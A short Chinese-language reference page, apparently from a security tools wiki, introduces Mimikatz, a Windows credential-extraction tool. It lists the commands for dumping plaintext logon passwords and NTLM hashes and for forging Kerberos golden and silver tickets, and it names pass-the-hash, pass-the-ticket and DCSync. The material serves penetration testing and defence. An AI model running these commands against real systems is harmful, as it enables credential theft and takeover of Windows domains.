---
title: "Mimikatz"
weight: 10
description: "Windows 凭证提取工具"
date: "2026-03-24T16:29:46+08:00"
lastmod: "2026-03-24T16:29:46+08:00"
---

## Mimikatz

Mimikatz 是一款 Windows 凭证提取工具，可以提取明文密码、哈希、PIN 码和 Kerberos 票据。

## 基础使用

### 提取明文密码
```bash
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
```

### 提取 NTLM 哈希
```bash
mimikatz # lsadump::sam
mimikatz # lsadump::security
```

### 黄金票据
```bash
mimikatz # kerberos::golden /user:admin /domain:target.com /krbtgt:HASH /id:500
```

### 白银票据
```bash
mimikatz # kerberos::golden /domain:target.com /sid:S-1-5-21 /rc4:HASH /service:cifs /user:admin
```

## 功能特性

- **凭证提取** - 提取明文密码和哈希
- **Kerberos 攻击** - 黄金/白银票据
- **哈希传递** - Pass-the-Hash
- **票据传递** - Pass-the-Ticket
- **DCSync** - 模拟 DC 同步

## 常用命令

| 命令 | 描述 |
|------|------|
| sekurlsa::logonpasswords | 提取登录凭证 |
| lsadump::sam | 转储 SAM 数据库 |
| kerberos::golden | 创建黄金票据 |
| kerberos::ptt | 导入票据 |
| misc::cmd | 启动系统命令 |

## 参考资源

- [Mimikatz GitHub](https://github.com/gentilkiwi/mimikatz)